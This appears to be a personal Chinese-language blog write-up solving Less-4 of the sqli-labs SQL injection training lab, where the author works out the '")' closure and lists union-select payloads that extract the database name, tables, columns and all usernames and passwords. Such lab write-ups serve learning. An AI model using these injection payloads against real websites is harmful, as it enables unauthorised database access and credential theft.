sqli-lab 4
今天看了一天的动漫
也该学习一会了
冲!
less-4
尝试注入1‘准备看报错,结果这页面啥事没有
这个时候我们就知道’不太行
所以我们换成"试试
成功报错
发现报错是’“1"”) LIMIT 0,1’
除去报错添加的’'还剩下
“1"”) LIMIT 0,1
看到了)我们猜测前面还有一个(,所以我们还需要一个)来与前面的)闭合,然后把后面的“)LIMIT 0,1注释掉
?id=1") --+
芜湖,成功回显
接下来又是平平无奇的机械操作时间
先找回显位
经典的2,3位
下面的机械操作由于我是懒狗我就不截图了
查询库名:?id=") union select 1,database(),3 --+
查询表名:?id=") union select 1,database(),(select group_concat(table_name) from information_schema.tables where table_schema=‘security’) --+
查询字段名:?id=") union select 1,database(),(select group_concat(column_name) from information_schema.columns where table_schema=‘security’ and table_name=‘users’) --+
查询内容:?id=") union select 1,group_concat(username),group_concat(password) from users --+
当当当当!
冲关成功!